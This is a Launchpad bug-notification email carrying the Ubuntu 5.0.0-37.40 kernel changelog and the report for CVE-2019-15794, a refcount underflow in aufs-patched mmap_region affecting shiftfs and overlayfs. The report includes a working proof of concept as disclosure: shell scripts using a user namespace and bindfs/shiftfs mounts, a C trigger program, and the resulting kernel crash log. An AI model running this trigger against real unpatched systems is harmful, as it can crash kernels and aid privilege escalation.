This bug was fixed in the package linux - 5.0.0-37.40
---------------
linux (5.0.0-37.40) disco; urgency=medium
* disco/linux: 5.0.0-37.40 -proposed tracker (LP: #1852253)
* System hangs at early boot (LP: #1851216)
- x86/timer: Skip PIT initialization on modern chipsets
* drm/i915: Add support for another CMP-H PCH (LP: #1848491)
- drm/i915/cml: Add second PCH ID for CMP
* Some EFI systems fail to boot in efi_init() when booted via maas
(LP: #1851810)
- efi: efi_get_memory_map -- increase map headroom
* seccomp: fix SECCOMP_USER_NOTIF_FLAG_CONTINUE test (LP: #1849281)
- SAUCE: seccomp: avoid overflow in implicit constant conversion
- SAUCE: seccomp: rework define for SECCOMP_USER_NOTIF_FLAG_CONTINUE
- SAUCE: seccomp: fix SECCOMP_USER_NOTIF_FLAG_CONTINUE test
* dkms artifacts may expire from the pool (LP: #1850958)
- [Packaging] dkms -- try launchpad librarian for pool downloads
- [Packaging] dkms -- dkms-build quieten wget verbiage
* update ENA driver to version 2.1.0 (LP: #1850175)
- net: ena: fix swapped parameters when calling
ena_com_indirect_table_fill_entry
- net: ena: fix: Free napi resources when ena_up() fails
- net: ena: fix incorrect test of supported hash function
- net: ena: fix return value of ena_com_config_llq_info()
- net: ena: improve latency by disabling adaptive interrupt moderation by
default
- net: ena: fix ena_com_fill_hash_function() implementation
- net: ena: add handling of llq max tx burst size
- net: ena: ethtool: add extra properties retrieval via get_priv_flags
- net: ena: replace free_tx/rx_ids union with single free_ids field in
ena_ring
- net: ena: arrange ena_probe() function variables in reverse christmas tree
- net: ena: add newline at the end of pr_err prints
- net: ena: documentation: update ena.txt
- net: ena: allow automatic fallback to polling mode
- net: ena: add support for changing max_header_size in LLQ mode
- net: ena: optimise calculations for CQ doorbell
- net: ena: add good checksum counter
- net: ena: use dev_info_once instead of static variable
- net: ena: add MAX_QUEUES_EXT get feature admin command
- net: ena: enable negotiating larger Rx ring size
- net: ena: make ethtool show correct current and max queue sizes
- net: ena: allow queue allocation backoff when low on memory
- net: ena: add ethtool function for changing io queue sizes
- net: ena: remove inline keyword from functions in *.c
- net: ena: update driver version from 2.0.3 to 2.1.0
- net: ena: Fix bug where ring allocation backoff stopped too late
- Revert "net: ena: ethtool: add extra properties retrieval via
get_priv_flags"
- net: ena: don't wake up tx queue when down
- net: ena: clean up indentation issue
* Add Intel Comet Lake ethernet support (LP: #1848555)
- SAUCE: e1000e: Add support for Comet Lake
* Intel Wireless AC 3168 on Eoan complaints FW error in SYNC CMD
GEO_TX_POWER_LIMIT (LP: #1846016)
- iwlwifi: exclude GEO SAR support for 3168
* tsc marked unstable after entered PC10 on Intel CoffeeLake (LP: #1840239)
- SAUCE: x86/intel: Disable HPET on Intel Coffe Lake platforms
- SAUCE: x86/intel: Disable HPET on Intel Ice Lake platforms
* cloudimg: no iavf/i40evf module so no network available with SR-IOV enabled
cloud (LP: #1848481)
- [Packaging] include iavf/i40evf in generic
* High power consumption using 5.0.0-25-generic (LP: #1840835)
- PCI: Add a helper to check Power Resource Requirements _PR3 existence
- ALSA: hda: Allow HDA to be runtime suspended when dGPU is not bound to a
driver
- PCI: Fix missing inline for pci_pr3_present()
* CML CPUIDs (LP: #1843794)
- x86/cpu: Add Comet Lake to the Intel CPU models header
* shiftfs: prevent exceeding project quotas (LP: #1849483)
- SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective capabilities
* shiftfs: fix fallocate() (LP: #1849482)
- SAUCE: shiftfs: setup correct s_maxbytes limit
* Bluetooth: hidp: Fix assumptions on the return value of hidp_send_message
(LP: #1850443)
- Bluetooth: hidp: Fix assumptions on the return value of hidp_send_message
* [SRU][B/OEM-B/OEM-OSP1/D/E] UBUNTU: SAUCE: add rtl623 codec support and fix
mic issues (LP: #1850599)
- SAUCE: ALSA: hda/realtek - Add support for ALC623
- SAUCE: ALSA: hda/realtek - Fix 2 front mics of codec 0x623
* NFSv4.1: Interrupted connections cause high bandwidth RPC ping-pong between
client and server (LP: #1828978)
- NFSv4.1: Avoid false retries when RPC calls are interrupted
* SUNRPC: Use after free when GSSD credentials are invalid causes oops
(LP: #1842037)
- SUNRPC: Clean up
- SUNRPC: Fix a use after free when a server rejects the RPCSEC_GSS
credential
* Suppress "hid_field_extract() called with n (192) > 32!" message floods
(LP: #1850600)
- HID: core: reformat and reduce hid_printk macros
- HID: core: Add printk_once variants to hid_warn() etc
- HID: core: fix dmesg flooding if report field larger than 32bit
* ubuntu-aufs-modified mmap_region() breaks refcounting in overlayfs/shiftfs
error path (LP: #1850994) // CVE-2019-15794
- SAUCE: shiftfs: Restore vm_file value when lower fs mmap fails
- SAUCE: ovl: Restore vm_file value when lower fs mmap fails
* s_iflags overlap prevents unprivileged overlayfs mounts (LP: #1851677)
- SAUCE: fs: Move SB_I_NOSUID to the top of s_iflags
* root can lift kernel lockdown (LP: #1851380)
- SAUCE: (efi-lockdown) Really don't allow lifting lockdown from userspace
* Disco update: upstream stable patchset 2019-11-01 (LP: #1850974)
- panic: ensure preemption is disabled during panic()
- f2fs: use EINVAL for superblock with invalid magic
- [Config] updateconfigs for USB_RIO500
- USB: rio500: Remove Rio 500 kernel driver
- USB: yurex: Don't retry on unexpected errors
- USB: yurex: fix NULL-derefs on disconnect
- USB: usb-skeleton: fix runtime PM after driver unbind
- USB: usb-skeleton: fix NULL-deref on disconnect
- xhci: Fix false warning message about wrong bounce buffer write length
- xhci: Prevent device initiated U1/U2 link pm if exit latency is too long
- xhci: Check all endpoints for LPM timeout
- xhci: Fix USB 3.1 capability detection on early xHCI 1.1 spec based hosts
- usb: xhci: wait for CNR controller not ready bit in xhci resume
- xhci: Prevent deadlock when xhci adapter breaks during init
- USB: adutux: fix use-after-free on disconnect
- USB: adutux: fix NULL-derefs on disconnect
- USB: adutux: fix use-after-free on release
- USB: iowarrior: fix use-after-free on disconnect
- USB: iowarrior: fix use-after-free on release
- USB: iowarrior: fix use-after-free after driver unbind
- USB: usblp: fix runtime PM after driver unbind
- USB: chaoskey: fix use-after-free on release
- USB: ldusb: fix NULL-derefs on driver unbind
- serial: uartlite: fix exit path null pointer
- USB: serial: keyspan: fix NULL-derefs on open() and write()
- USB: serial: ftdi_sio: add device IDs for Sienna and Echelon PL-20
- USB: serial: option: add Telit FN980 compositions
- USB: serial: option: add support for Cinterion CLS8 devices
- USB: serial: fix runtime PM after driver unbind
- USB: usblcd: fix I/O after disconnect
- USB: microtek: fix info-leak at probe
- USB: dummy-hcd: fix power budget for SuperSpeed mode
- usb: renesas_usbhs: gadget: Do not discard queues in
usb_ep_set_{halt,wedge}()
- usb: renesas_usbhs: gadget: Fix usb_ep_set_{halt,wedge}() behavior
- USB: legousbtower: fix slab info leak at probe
- USB: legousbtower: fix deadlock on disconnect
- USB: legousbtower: fix potential NULL-deref on disconnect
- USB: legousbtower: fix open after failed reset request
- USB: legousbtower: fix use-after-free on release
- mei: me: add comet point (lake) LP device ids
- mei: avoid FW version request on Ibex Peak and earlier
- gpio: eic: sprd: Fix the incorrect EIC offset when toggling
- Staging: fbtft: fix memory leak in fbtft_framebuffer_alloc
- staging: vt6655: Fix memory leak in vt6655_probe
- iio: adc: hx711: fix bug in sampling of data
- iio: adc: ad799x: fix probe error handling
- iio: adc: axp288: Override TS pin bias current for some models
- iio: light: opt3001: fix mutex unlock race
- efivar/ssdt: Don't iterate over EFI vars if no SSDT override was specified
- perf llvm: Don't access out-of-scope array
- perf inject jit: Fix JIT_CODE_MOVE filename
- CIFS: Gracefully handle QueryInfo errors during open
- CIFS: Force revalidate inode when dentry is stale
- CIFS: Force reval dentry if LOOKUP_REVAL flag is set
- kernel/sysctl.c: do not override max_threads provided by userspace
- mm/vmpressure.c: fix a signedness bug in vmpressure_register_event()
- firmware: google: increment VPD key_len properly
- gpiolib: don't clear FLAG_IS_OUT when emulating open-drain/open-source
- iio: adc: stm32-adc: move registers definitions
- iio: adc: stm32-adc: fix a race when using several adcs with dma and irq
- cifs: use cifsInodeInfo->open_file_lock while iterating to avoid a panic
- btrfs: fix incorrect updating of log root tree
- btrfs: fix uninitialized ret in ref-verify
- NFS: Fix O_DIRECT accounting of number of bytes read/written
- MIPS: Disable Loongson MMI instructions for kernel build
- MIPS: elf_hwcap: Export userspace ASEs
- ACPI/PPTT: Add support for ACPI 6.3 thread flag
- arm64: topology: Use PPTT to determine if PE is a thread
- Fix the locking in dcache_readdir() and friends
- media: stkwebcam: fix runtime PM after driver unbind
- arm64/sve: Fix wrong free for task->thread.sve_state
- tracing/hwlat: Report total time spent in all NMIs during the sample
- tracing/hwlat: Don't ignore outer-loop duration when calculating
max_latency
- ftrace: Get a reference counter for the trace_array on filter files
- tracing: Get trace_array reference for available_tracers files
- hwmon: Fix HWMON_P_MIN_ALARM mask
- x86/asm: Fix MWAITX C-state hint value
- perf/hw_breakpoint: Fix arch_hw_breakpoint use-before-initialization
- serial: uartps: Fix uartps_major handling
- usb: typec: tcpm: usb: typec: tcpm: Fix a signedness bug in
tcpm_fw_get_caps()
- staging: bcm2835-audio: Fix draining behavior regression
- staging: rtl8188eu: fix HighestRate check in odm_ARFBRefresh_8188E()
- iio: accel: adxl372: Fix/remove limitation for FIFO samples
- iio: accel: adxl372: Fix push to buffers lost samples
- iio: accel: adxl372: Perform a reset at start up
- selinux: fix context string corruption in convert_context()
- mm/z3fold.c: claim page in the beginning of free
- mm/page_alloc.c: fix a crash in free_pages_prepare()
- gpio: fix getting nonexclusive gpiods from DT
- btrfs: fix balance convert to single on 32-bit host CPUs
- Btrfs: fix memory leak due to concurrent append writes with fiemap
- RDMA/vmw_pvrdma: Free SRQ only once
- drm/i915: Whitelist COMMON_SLICE_CHICKEN2
- mtd: rawnand: au1550nd: Fix au_read_buf16() prototype
* Suspend stopped working from 4.4.0-157 onwards (LP: #1844021) // Disco
update: upstream stable patchset 2019-11-01 (LP: #1850974)
- xhci: Increase STS_SAVE timeout in xhci_suspend()
* Disco update: upstream stable patchset 2019-10-31 (LP: #1850870)
- s390/process: avoid potential reading of freed stack
- KVM: s390: Test for bad access register and size at the start of
S390_MEM_OP
- s390/topology: avoid firing events before kobjs are created
- s390/cio: exclude subchannels with no parent from pseudo check
- KVM: PPC: Book3S HV: Fix race in re-enabling XIVE escalation interrupts
- KVM: PPC: Book3S HV: Check for MMU ready on piggybacked virtual cores
- KVM: PPC: Book3S HV: Don't lose pending doorbell request on migration on
P9
- KVM: X86: Fix userspace set invalid CR4
- nbd: fix max number of supported devs
- PM / devfreq: tegra: Fix kHz to Hz conversion
- ASoC: Define a set of DAPM pre/post-up events
- ASoC: sgtl5000: Improve VAG power and mute control
- powerpc/mce: Fix MCE handling for huge pages
- powerpc/mce: Schedule work from irq_work
- powerpc/powernv: Restrict OPAL symbol map to only be readable by root
- powerpc/powernv/ioda: Fix race in TCE level allocation
- powerpc/book3s64/mm: Don't do tlbie fixup for some hardware revisions
- can: mcp251x: mcp251x_hw_reset(): allow more time after a reset
- tools lib traceevent: Fix "robust" test of do_generate_dynamic_list_file
- crypto: qat - Silence smp_processor_id() warning
- crypto: skcipher - Unmap pages after an external error
- crypto: cavium/zip - Add missing single_release()
- crypto: caam - fix concurrency issue in givencrypt descriptor
- crypto: ccree - account for TEE not ready to report
- crypto: ccree - use the full crypt length value
- MIPS: Treat Loongson Extensions as ASEs
- power: supply: sbs-battery: use correct flags field
- power: supply: sbs-battery: only return health when battery present
- tracing: Make sure variable reference alias has correct var_ref_idx
- usercopy: Avoid HIGHMEM pfn warning
- timer: Read jiffies once when forwarding base clk
- PCI: vmd: Fix shadow offsets to reflect spec changes
- watchdog: imx2_wdt: fix min() calculation in imx2_wdt_set_timeout
- perf stat: Fix a segmentation fault when using repeat forever
- drm/omap: fix max fclk divider for omap36xx
- drm/msm/dsi: Fix return value check for clk_get_parent
- drm/nouveau/kms/nv50-: Don't create MSTMs for eDP connectors
- drm/i915/gvt: update vgpu workload head pointer correctly
- mmc: sdhci: improve ADMA error reporting
- mmc: sdhci-of-esdhc: set DMA snooping based on DMA coherence
- Revert "locking/pvqspinlock: Don't wait if vCPU is preempted"
- xen/xenbus: fix self-deadlock after killing user process
- ieee802154: atusb: fix use-after-free at disconnect
- s390/cio: avoid calling strlen on null pointer
- cfg80211: initialize on-stack chandefs
- ima: always return negative code for error
- ima: fix freeing ongoing ahash_request
- fs: nfs: Fix possible null-pointer dereferences in encode_attrs()
- 9p: Transport error uninitialized
- 9p: avoid attaching writeback_fid on mmap with type PRIVATE
- xen/pci: reserve MCFG areas earlier
- ceph: fix directories inode i_blkbits initialization
- ceph: reconnect connection if session hang in opening state
- watchdog: aspeed: Add support for AST2600
- netfilter: nf_tables: allow lookups in dynamic sets
- drm/amdgpu: Fix KFD-related kernel oops on Hawaii
- drm/amdgpu: Check for valid number of registers to read
- pNFS: Ensure we do clear the return-on-close layout stateid on fatal
errors
- pwm: stm32-lp: Add check in case requested period cannot be achieved
- x86/purgatory: Disable the stackleak GCC plugin for the purgatory
- ntb: point to right memory window index
- thermal: Fix use-after-free when unregistering thermal zone device
- thermal_hwmon: Sanitize thermal_zone type
- libnvdimm/region: Initialize bad block for volatile namespaces
- fuse: fix memleak in cuse_channel_open
- libnvdimm/nfit_test: Fix acpi_handle redefinition
- sched/membarrier: Call sync_core only before usermode for same mm
- sched/membarrier: Fix private expedited registration check
- sched/core: Fix migration to invalid CPU in __set_cpus_allowed_ptr()
- perf build: Add detection of java-11-openjdk-devel package
- kernel/elfcore.c: include proper prototypes
- perf unwind: Fix libunwind build failure on i386 systems
- nfp: flower: fix memory leak in nfp_flower_spawn_vnic_reprs
- drm/radeon: Bail earlier when radeon.cik_/si_support=0 is passed
- KVM: PPC: Book3S HV: XIVE: Free escalation interrupts before disabling the
VP
- KVM: nVMX: Fix consistency check on injected exception error code
- nbd: fix crash when the blksize is zero
- powerpc/pseries: Fix cpu_hotplug_lock acquisition in resize_hpt()
- powerpc/book3s64/radix: Rename CPU_FTR_P9_TLBIE_BUG feature flag
- tools lib traceevent: Do not free tep->cmdlines in add_new_comm() on
failure
- tick: broadcast-hrtimer: Fix a race in bc_set_next
- perf tools: Fix segfault in cpu_cache_level__read()
- perf stat: Reset previous counts on repeat with interval
- riscv: Avoid interrupts being erroneously enabled in handle_exception()
- arm64: Add sysfs vulnerability show for spectre-v1
- arm64: add sysfs vulnerability show for meltdown
- arm64: enable generic CPU vulnerabilites support
- arm64: Always enable ssb vulnerability detection
- arm64: Provide a command line to disable spectre_v2 mitigation
- arm64: Advertise mitigation of Spectre-v2, or lack thereof
- arm64: Always enable spectre-v2 vulnerability detection
- arm64: add sysfs vulnerability show for spectre-v2
- arm64: add sysfs vulnerability show for speculative store bypass
- arm64: ssbs: Don't treat CPUs with SSBS as unaffected by SSB
- arm64: Use firmware to detect CPUs that are not affected by Spectre-v2
- arm64/speculation: Support 'mitigations=' cmdline option
- vfs: Fix EOVERFLOW testing in put_compat_statfs64
- coresight: etm4x: Use explicit barriers on enable/disable
- staging: erofs: fix an error handling in erofs_readdir()
- staging: erofs: some compressed cluster should be submitted for corrupted
images
- staging: erofs: add two missing erofs_workgroup_put for corrupted images
- staging: erofs: detect potential multiref due to corrupted images
- cfg80211: add and use strongly typed element iteration macros
- cfg80211: Use const more consistently in for_each_element macros
- nl80211: validate beacon head
- KVM: s390: fix __insn32_query() inline assembly
- crypto: caam/qi - fix error handling in ERN handler
- PCI: vmd: Fix config addressing when using bus offsets
- drm/atomic: Reject FLIP_ASYNC unconditionally
- drm/atomic: Take the atomic toys away from X
- drm/i915: to make vgpu ppgtt notificaiton as atomic operation
- mac80211: keep BHs disabled while calling drv_tx_wake_queue()
- mmc: tegra: Implement ->set_dma_mask()
- mmc: sdhci: Let drivers define their DMA mask
- libnvdimm/altmap: Track namespace boundaries in altmap
- DTS: ARM: gta04: introduce legacy spi-cs-high to make display work again
- xprtrdma: Toggle XPRT_CONGESTED in xprtrdma's slot methods
- fuse: fix request limit
- ceph: fetch cap_gen under spinlock in ceph_add_cap
- perf probe: Fix to clear tev->nargs in clear_probe_trace_event()
- selftests/seccomp: fix build on older kernels
- iommu/amd: Fix downgrading default page-sizes in alloc_pte()
- bpf: Fix bpf_event_output re-entry issue
- i2c: qcom-geni: Disable DMA processing on the Lenovo Yoga C630
- mlxsw: spectrum_flower: Fail in case user specifies multiple mirror
actions
- nfp: abm: fix memory leak in nfp_abm_u32_knode_replace
- Btrfs: fix selftests failure due to uninitialized i_mode in test inodes
- libnvdimm: prevent nvdimm from requesting key when security is disabled
-- Connor Kuehl <[email protected]> Wed, 13 Nov 2019 11:35:47
-0800
** Changed in: linux (Ubuntu Disco)
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/1850994
Title:
ubuntu-aufs-modified mmap_region() breaks refcounting in
overlayfs/shiftfs error path
Status in linux package in Ubuntu:
In Progress
Status in linux source package in Disco:
Fix Released
Status in linux source package in Eoan:
Fix Released
Status in linux source package in Focal:
In Progress
Bug description:
SRU Justification
Impact: overlayfs and shiftfs both replace vma->vm_file in their mmap
handlers. On error the original value is not restored, and the
reference is put for the file to which vm_file points. On upstream
kernels this is not an issue, as no callers dereference vm_file
dereference vm_file following after call_mmap() returns an error.
However, the aufs patchs change mmap_region() to replace the fput()
using a local variable with vma_fput(), which will fput() vm_file,
leading to a refcount underflow.
Fix: Restore the original vma_file value on error.
Test Case: See below.
Regression Potential: Minimal. As stated above, other callers of
call_mmap() do not dereference vma->vm_file when it returns an error,
and the one which does is fixed by these patches.
Notes: Supported kernels prior to disco are not affected as overlayfs
did not support mmap until 4.19, and shiftfs was not present in Ubuntu
kernels before disco. The issue is mitigated for overlayfs by another
bug which is preventing unprivileged mounting; a patch for this issue
will be sent separately.
---
Tested on 19.10.
Ubuntu's aufs kernel patch includes the following change (which I
interestingly
can't see in the AUFS code at
https://github.com/sfjro/aufs5-linux/blob/master/mm/mmap.c):
==================================================================
+#define vma_fput(vma) vma_do_fput(vma, __func__, __LINE__)
[...]
@@ -1847,8 +1847,8 @@ unsigned long mmap_region(struct file *file, unsigned
long addr,
return addr;
unmap_and_free_vma:
+ vma_fput(vma);
vma->vm_file = NULL;
- fput(file);
/* Undo any partial mapping done by a device driver. */
unmap_region(mm, vma, prev, vma->vm_start, vma->vm_end);
[...]
+void vma_do_fput(struct vm_area_struct *vma, const char func[], int line)
+{
+ struct file *f = vma->vm_file, *pr = vma->vm_prfile;
+
+ prfile_trace(f, pr, func, line, __func__);
+ fput(f);
+ if (f && pr)
+ fput(pr);
+}
==================================================================
This means that in the case where call_mmap() returns an error to
mmap_region(),
fput() will be called on the current value of vma->vm_file instead of the
saved
file pointer. This matters if the ->mmap() handler replaces ->vm_file before
returning an error code.
overlayfs and shiftfs do that when call_mmap() on the lower filesystem fails,
see ovl_mmap() and shiftfs_mmap().
To demonstrate the issue, the PoC below mounts a shiftfs that is backed by a
FUSE filesystem with the FUSE flag FOPEN_DIRECT_IO, which causes
fuse_file_mmap()
to bail out with -ENODEV if MAP_SHARED is set.
I would have used overlayfs instead, but there is an unrelated bug that makes
it
impossible to mount overlayfs inside a user namespace:
Commit 82c0860106f264 ("UBUNTU: SAUCE: overlayfs: Propogate nosuid from lower
and upper mounts") defines SB_I_NOSUID as 0x00000010, but SB_I_USERNS_VISIBLE
already has the same value. This causes mount_too_revealing() to bail out
with a
WARN_ONCE().
Note that this PoC requires the "bindfs" package and should be executed with
"slub_debug" in the kernel commandline to get a clear crash.
==================================================================
Ubuntu 19.10 user-Standard-PC-Q35-ICH9-2009 ttyS0
user-Standard-PC-Q35-ICH9-2009 login: user
Password:
Last login: Fr Nov 1 23:45:36 CET 2019 on ttyS0
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-19-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 updates can be installed immediately.
0 of these updates are security updates.
user@user-Standard-PC-Q35-ICH9-2009:~$ ls
aufs-mmap Documents Music Public trace.dat
Desktop Downloads Pictures Templates Videos
user@user-Standard-PC-Q35-ICH9-2009:~$ cd aufs-mmap/
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic
root=UUID=f7d8d4fb-0c96-498e-b875-0b777127a332 ro console=ttyS0 slub_debug
quiet splash vt.handoff=7
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run.sh
#!/bin/sh
sync
unshare -mUr ./run2.sh
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run2.sh
#!/bin/bash
set -e
mount -t tmpfs none /tmp
mkdir -p /tmp/{lower,middle,upper}
touch /tmp/lower/foo
# mount some random FUSE filesystem with direct_io,
# doesn't really matter what it does as long as
# there's a file in it.
# (this is just to get some filesystem that can
# easily be convinced to throw errors from f_op->mmap)
bindfs -o direct_io /tmp/lower /tmp/middle
# use the FUSE filesystem to back shiftfs.
# overlayfs would also work if SB_I_NOSUID and
# SB_I_USERNS_VISIBLE weren't defined to the same
# value...
mount -t shiftfs -o mark /tmp/middle /tmp/upper
mount|grep shift
gcc -o trigger trigger.c -Wall
./trigger
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat trigger.c
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>
int main(void) {
int foofd = open("/tmp/upper/foo", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
void *badmap = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
if (badmap == MAP_FAILED) {
perror("badmap");
} else {
errx(1, "badmap worked???");
}
sleep(1);
mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
}
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ ./run.sh
/tmp/middle on /tmp/upper type shiftfs (rw,relatime,mark)
badmap: No such device
[ 72.101721] general protection fault: 0000 [#1] SMP PTI
[ 72.111917] CPU: 1 PID: 1376 Comm: trigger Not tainted 5.3.0-19-generic
#20-Ubuntu
[ 72.124846] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS
1.12.0-1 04/01/2014
[ 72.140965] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 72.149210] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5
41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78
60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 72.167229] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
[ 72.170426] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX:
7800000000000000
[ 72.174528] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI:
ffff9c1cc48b5900
[ 72.177790] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09:
0000000000000000
[ 72.181199] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12:
ffff9c1cf1ae5790
[ 72.186306] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15:
ffff9c1cf7209740
[ 72.189705] FS: 00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000)
knlGS:0000000000000000
[ 72.193073] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 72.195390] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4:
0000000000360ee0
[ 72.198237] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 72.200557] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:
0000000000000400
[ 72.202815] Call Trace:
[ 72.203712] mmap_region+0x417/0x670
[ 72.204868] do_mmap+0x3a8/0x580
[ 72.205939] vm_mmap_pgoff+0xcb/0x120
[ 72.207954] ksys_mmap_pgoff+0x1ca/0x2a0
[ 72.210078] __x64_sys_mmap+0x33/0x40
[ 72.211327] do_syscall_64+0x5a/0x130
[ 72.212538] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 72.214177] RIP: 0033:0x7faa3ecc7af6
[ 72.215352] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48
89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00
f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 72.222275] RSP: 002b:00007ffd0fc44c68 EFLAGS: 00000246 ORIG_RAX:
0000000000000009
[ 72.224714] RAX: ffffffffffffffda RBX: 0000000000000001 RCX:
00007faa3ecc7af6
[ 72.228123] RDX: 0000000000000001 RSI: 0000000000001000 RDI:
0000000000000000
[ 72.230913] RBP: 0000000000000000 R08: 0000000000000003 R09:
0000000000000000
[ 72.233193] R10: 0000000000000001 R11: 0000000000000246 R12:
0000556248213100
[ 72.235448] R13: 00007ffd0fc44d70 R14: 0000000000000000 R15:
0000000000000000
[ 72.237681] Modules linked in: shiftfs intel_rapl_msr
snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core
snd_hwdep snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_common
crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64
crypto_simd snd_seq cryptd glue_helper joydev input_leds serio_raw
snd_seq_device snd_timer snd qxl ttm soundcore qemu_fw_cfg drm_kms_helper drm
fb_sys_fops syscopyarea sysfillrect sysimgblt mac_hid sch_fq_codel parport_pc
ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid
virtio_net net_failover failover ahci psmouse lpc_ich i2c_i801 libahci
virtio_blk
[ 72.257673] ---[ end trace 5d85e7b7b0bae5f5 ]---
[ 72.259237] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 72.260990] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5
41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78
60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 72.269615] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
[ 72.271414] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX:
7800000000000000
[ 72.273893] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI:
ffff9c1cc48b5900
[ 72.276354] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09:
0000000000000000
[ 72.278796] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12:
ffff9c1cf1ae5790
[ 72.281095] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15:
ffff9c1cf7209740
[ 72.284048] FS: 00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000)
knlGS:0000000000000000
[ 72.287161] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 72.289164] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4:
0000000000360ee0
[ 72.291953] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 72.294487] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:
0000000000000400
==================================================================
Faulting code:
0000000F 55 push rbp
00000010 4889E5 mov rbp,rsp
00000013 4157 push r15
00000015 4156 push r14
00000017 4155 push r13
00000019 4154 push r12
0000001B 488B87C8000000 mov rax,[rdi+0xc8]
00000022 4C8B6810 mov r13,[rax+0x10]
00000026 498B4528 mov rax,[r13+0x28]
0000002A 4883786000 cmp qword [rax+0x60],byte +0x0 <<<< GPF HERE
0000002F 0F8497000000 jz near 0xcc
00000035 4989FC mov r12,rdi
00000038 4989F6 mov r14,rsi
As you can see, the poison value 6b6b6b6b6b6b6b6b is being
dereferenced.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1850994/+subscriptions
--
Mailing list: https://launchpad.net/~kernel-packages
Post to : [email protected]
Unsubscribe : https://launchpad.net/~kernel-packages
More help : https://help.launchpad.net/ListHelp
